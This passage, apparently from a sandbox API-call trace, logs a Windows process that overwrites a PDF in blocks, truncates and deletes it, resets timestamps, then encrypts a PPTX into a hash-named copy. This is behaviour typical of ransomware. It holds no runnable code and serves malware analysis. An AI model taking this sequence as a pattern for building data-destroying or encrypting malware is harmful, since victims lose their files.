| out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.089] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.090] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.091] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.091] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.091] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x200, lpOverlapped=0x0) returned 1 [0076.092] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.092] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.093] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.094] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.095] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.095] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.096] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.097] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.098] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.099] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.099] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.100] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.101] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.102] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.102] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.102] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x200, lpOverlapped=0x0) returned 1 [0076.103] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.103] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.104] WriteFile (in: hFile=0x36c, lpBuffer=0x21f8ad8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21f8ad8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.106] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.106] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.106] SetEndOfFile (hFile=0x36c) returned 1 [0076.107] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\2lo0oyad.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.108] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\2lo0oyad.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.108] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.108] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\2lo0oyad.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.108] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.109] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.109] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\2lo0oyad.pdf")) returned 1 [0076.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\2Lo0OYAD.pdf", lpFilePart=0x0) returned 0x3d [0076.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", lpFilePart=0x0) returned 0x51 [0076.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\925cbcbb26e717bfa0c7f5111eed9487"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.134] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", lpFilePart=0x0) returned 0x51 [0076.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\925cbcbb26e717bfa0c7f5111eed9487"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.134] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487", lpFilePart=0x0) returned 0x51 [0076.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\925CBCBB26E717BFA0C7F5111EED9487" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\925cbcbb26e717bfa0c7f5111eed9487"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.135] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.136] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x2205248, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626e50) returned 1 [0076.136] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.136] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.136] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2205338, pdwDataLen=0x1bf5d230 | out: pbData=0x2205338*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.136] CryptImportKey (in: hProv=0x1a5b7710, pbData=0x2205458, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626de0) returned 1 [0076.136] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.136] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.136] CryptDuplicateKey (in: hKey=0x1a626de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626d00) returned 1 [0076.136] CryptContextAddRef (hProv=0x1a5b7710, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.136] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x4, pbData=0x22055a0*=0x1, dwFlags=0x0) returned 1 [0076.136] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x1, pbData=0x2205550, dwFlags=0x0) returned 1 [0076.136] CryptDestroyKey (hKey=0x1a626de0) returned 1 [0076.136] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0076.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx", lpFilePart=0x0) returned 0x4a [0076.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\a5oX7vcF1xLWkgUWyerC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\a5ox7vcf1xlwkguwyerc.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.137] GetFileType (hFile=0x36c) returned 0x1 [0076.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.137] GetFileType (hFile=0x36c) returned 0x1 [0076.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", lpFilePart=0x0) returned 0x51 [0076.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\b04b5fa7a8b34412fc4fbd3a1815f30e"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.137] GetFileType (hFile=0x3a4) returned 0x1 [0076.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.137] GetFileType (hFile=0x3a4) returned 0x1 [0076.137] ReadFile (in: hFile=0x36c, lpBuffer=0x22059a0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22059a0*, lpNumberOfBytesRead=0x1bf5d128*=0xba10, lpOverlapped=0x0) returned 1 [0076.138] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22199b8*, pdwDataLen=0x1bf5d180*=0xba10, dwBufLen=0xba10 | out: pbData=0x22199b8*, pdwDataLen=0x1bf5d180*=0xba10) returned 1 [0076.139] WriteFile (in: hFile=0x3a4, lpBuffer=0x22199b8*, nNumberOfBytesToWrite=0xba10, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x22199b8*, lpNumberOfBytesWritten=0x1bf5d118*=0xba10, lpOverlapped=0x0) returned 1 [0076.140] ReadFile (in: hFile=0x36c, lpBuffer=0x22059a0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22059a0*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.140] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2225408*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x2225408*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.140] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2225458*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x2225458*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.140] WriteFile (in: hFile=0x3a4, lpBuffer=0x22254a8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x22254a8*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.141] CloseHandle (hObject=0x3a4) returned 1 [0076.141] CloseHandle (hObject=0x36c) returned 1 [0076.142] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0076.142] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0076.142] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0076.142] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E", lpFilePart=0x0) returned 0x51 [0076.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.142] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\B04B5FA7A8B34412FC4FBD3A1815F30E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\b04b5fa7a8b34412fc4fbd3a1815f30e"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.142] GetFileType (hFile=0x36c) returned 0x1 [0076.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.142] GetFileType (hFile=0x36c) returned 0x1 [0076.142] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.143] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.144] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.145] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.146] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.146] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.147] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.147] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.147] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.147] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.147] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.147] ReadFile (in: hFile=0x36c, lpBuffer=0x2226bb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x2226bb0*, lpNumberOfBytesRead=0x1bf5d148*=0xa20, lpOverlapped=0x0) returned 1 [0076.147] ReadFile (in: 